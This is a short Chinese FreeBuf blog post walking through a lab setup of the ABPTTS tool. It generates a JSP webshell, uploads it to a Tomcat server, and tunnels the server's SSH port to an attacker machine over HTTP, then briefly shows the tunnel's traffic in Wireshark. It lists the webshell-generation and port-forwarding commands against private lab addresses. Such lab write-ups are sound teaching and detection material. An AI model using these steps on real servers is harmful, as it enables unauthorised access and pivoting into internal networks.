freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

abptts隧道搭建以及流量分析
2021-01-05 15:13:03

0x001

各位朋友们好,这是我第一次发技术文章,如果有不对的地方,欢迎各位大佬前来指教

环境:

攻击机kali 192.168.125.129

靶机 内网Centos7 Tomcat 192.168.125.134

内网kali 192.168.125.135

步骤一:环境配置

在攻击机上安装python2模块

1.首先验证pip版本

pip –version1609829551_5ff40cafec75797f3020c.png!small

2.如果显示为pip2继续安装没款,如不是pip2或者无pip2,先去安装pip2

pip install pycrypto

1609829619_5ff40cf3efd7209db82da.png!small

pip install httplib21609829647_5ff40d0f1678231dfa5df.png!small

步骤二:攻击过程

在攻击机上用git命令把github上的ABPTTS包拉取下来

1.git clone https://github.com/nccgroup/ABPTTS.git

1609829670_5ff40d26bd84ebdee5a4c.png!small

2.进入ABPTTS文件目录下

cd ABPTTS

1609829686_5ff40d36dcd6277c979f9.png!small

3.使用python abpttsfactory.py -o webshell生成对应webshell,会在当前目录下生成webshell                        文件,里面存放着jsp和aspx的webshell文件

1609829724_5ff40d5ce292cfb89db1b.png!small

4.把生成的webshell上传到web服务器上(由于此处为演示,使用的是scp上传)

1609829766_5ff40d8646e980757ac77.png!small

5.浏览器访问http://192.168.125.134:8081/abptts.jsp,如下图所示为成功

1609829785_5ff40d99ce000360606e3.png!small

6.用Centos Tomcat 通过ssh 链接内网kali

1609829803_5ff40dab802ecaf94bcfd.png!small

7.执行 python abpttsclient.py -c webshell/config.txt -u http://192.168.

125.134:8081/abptts.jsp -f 127.0.0.1:1234/127.0.0.1:22目的是把centos tomcat的22端口                           映射到攻击机的1234端口

1609829830_5ff40dc6ae9b586e0dc6a.png!small

8.在攻击机上使用ssh链接127.0.0.1:1234就直连到centos tomcat机器上了

1609829885_5ff40dfd484a975e19cca.png!small

1609829908_5ff40e14f0f6f198dd028.png!small

步骤三:流量分析

1.使用wireshark进行抓包发现此隧道是走http协议,特征如下1609829916_5ff40e1c7008bd7eceee8.png!small

# web安全 # 内网渗透 # 工具使用 # 隧道传输 # 隧道检测
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者